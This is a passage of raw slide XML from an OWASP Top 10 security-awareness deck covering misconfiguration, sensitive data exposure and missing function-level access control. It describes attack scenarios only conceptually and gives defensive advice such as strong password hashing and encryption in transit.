              <a:rPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>all code libraries as well (see new A9)</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A strong application architecture that provides effective, secure </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>separation </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>between components.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Consider running scans and doing audits periodically to help detect future misconfigurations or missing patches.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="Title 25"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Security Misconfiguration</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A5</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760188898"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="0" y="948520"/>
          <a:ext cx="6858000" cy="253345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770">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748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5650">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w</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>ho can gain access to your sensitive data</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> and any</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> backups</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> of that data.</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> This includes the data at rest, in transit, and even</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> in your customers’ browsers. Include both external and internal threats.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 typically don’t break crypto</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> directly. They break something else, such as steal keys, do man-in-the-middle attacks, or steal clear text data off the server, while in transit, or from the user’s browser.</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The most common flaw</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="0" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> is simply not encrypting sensitive data. When crypto is employed, weak key generation and management, and weak algorithm usage is common, particularly weak password hashing techniques. Browser weaknesses are very common and easy to detect, but hard to exploit on a large scale. External attackers have difficulty detecting server side flaws due to limited access and they are also usually hard to exploit. </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Failure frequently</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> compromises all data that should have been protected. Typically, this information includes  sensitive data such as health records, credentials, personal data, credit cards, etc.</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lost data</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> and impact to your reputation. What is your legal liability if this data is exposed? Also consider the damage to your reputation.</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An application encrypts credit card numbers in a database using automatic database encryption. However, this means it also decrypts this data automatically when retrieved, allowing an SQL injection flaw to retrieve credit card numbers in clear text. The system should have encrypted the credit card numbers using a public key, and only allowed back-end applications to decrypt them with the private key.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" u="sng" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Scenario </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>#2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>A site simply doesn’t use SSL for all </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>authenticated pages. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Attacker simply monitors network traffic (like an open wireless </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>network</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>), and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>steals the user’s </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>session cookie. Attacker then replays this cookie and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>hijacks </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>the user’s </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>session, accessing the user’s private data.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Scenario #3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>: The password database uses unsalted hashes to store everyone’s passwords. A file upload flaw allows an attacker to retrieve the password file. All of the unsalted hashes can be exposed with a rainbow table of precalculated hashes.</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Data Exposure?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first thing you have to determine is which data is sensitive enough to require extra protection. For example, passwords, credit card numbers, health records, and personal information should be protected. For all such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Is any of this data stored in clear text long term, including backups of this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Is any of this data transmitted in clear text, internally or externally</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>?</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Internet traffic is especially dangerous.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Are any old / weak cryptographic algorithms used?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Are weak crypto keys generated, or is proper key management or rotation missing?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Are any browser security directives or headers missing when sensitive data is provided by </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> sent to the browser</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-228600">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>And more … For a more complete set of problems to avoid, see </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>ASVS areas Crypto (V7), Data Prot. (V9), and SSL (V10)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:hlinkClick r:id="rId5"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>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r>
              <a:rPr lang="en-US" sz="800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>- </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>For a more complete set of requirements, see </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>ASVS req’ts on Cryptography (V7), Data Protection (V9)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t> Communications </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>Security (V10)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" u="sng" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:hlinkClick r:id="rId5"/>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6"/>
              </a:rPr>
              <a:t>OWASP Cryptographic Storage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a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId7"/>
              </a:rPr>
              <a:t>OWASP Password Storage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8"/>
              </a:rPr>
              <a:t>OWASP Transport Layer Protection Cheat Sheet</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9"/>
              </a:rPr>
              <a:t>OWASP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" u="sng" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId9"/>
              </a:rPr>
              <a:t>Testing Guide: Chapter on SSL/TLS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId9"/>
              </a:rPr>
              <a:t>Testing</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310 on Cryptographic Issues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312 on Cleartext Storage of Sensitive Information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3"/>
              </a:rPr>
              <a:t>CWE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" u="sng" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId13"/>
              </a:rPr>
              <a:t>Entry 319 on Cleartext Transmission of Sensitive </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId13"/>
              </a:rPr>
              <a:t>Information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14"/>
              </a:rPr>
              <a:t>CWE Entry 326 on Weak Encryption</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" u="sng" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>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The full perils of unsafe cryptography, SSL usage, and data protection are well beyond the scope of the Top 10. That said, for all sensitive data, do all of the following, at a minimum:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Considering the threats you plan to protect this data from (e.g., insider attack, external user), make sure you encrypt all sensitive data at rest and in transit in a manner that defends against these threats.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Don’t store sensitive data unnecessarily. Discard it as soon as possible. Data you don’t have can’t be stolen.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Ensure strong standard algorithms and strong keys are used, and proper key management is in place. Consider using </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId15"/>
              </a:rPr>
              <a:t>FIPS 140 validated cryptographic modules</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a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Ensure passwords </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>are stored with an algorithm specifically designed for password protection, such as </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId16"/>
              </a:rPr>
              <a:t>b</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId16"/>
              </a:rPr>
              <a:t>crypt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId17"/>
              </a:rPr>
              <a:t>PBKDF2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId18"/>
              </a:rPr>
              <a:t>scrypt</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Disable autocomplete on forms collecting sensitive data and disable caching for pages that contain sensitive data.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="Title 25"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Sensitive Data Exposure</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A6</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4131929935"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="0" y="948520"/>
          <a:ext cx="6858000" cy="2539317"/>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5302">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>y</a:t>
                      </a:r>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055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9783">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Anyone with network access can send your application a request. Could</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> anonymous users access private functionality or regular users a privileged function? </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a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> who is an authorized system user, simply changes the URL or a parameter to a privileged function. Is access granted? Anonymous users could access private functions that aren’t protected.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Applications do not always</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="0" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> protect application functions properly. Sometimes, function level protection is managed via configuration, and the system is misconfigured. Sometimes, developers must include the proper code checks, and they forget.</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="0" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Detecting such flaws is easy. The hardest part is identifying which pages (URLs) or functions exist to attack.</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allow attackers to access unauthorized functionality.</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> Administrative functions are key targets for this type of attack.</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exposed functions and the data they process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impact to your reputation if this vulnerability became public.</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The attacker simply force browses to target URLs. The following URLs require authentication. Admin rights are also required for access to the “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t>admin_getappInfo” </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>page.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="200"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  http://example.com/app/getappInfo</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="C00000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="200"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  http://example.com/app/admin_getappInfo</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="C00000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>If an unauthenticated user can  access either page, that’s a flaw. If an authenticated, non-admin, user is allowed to access the “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t>admin_getappInfo”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
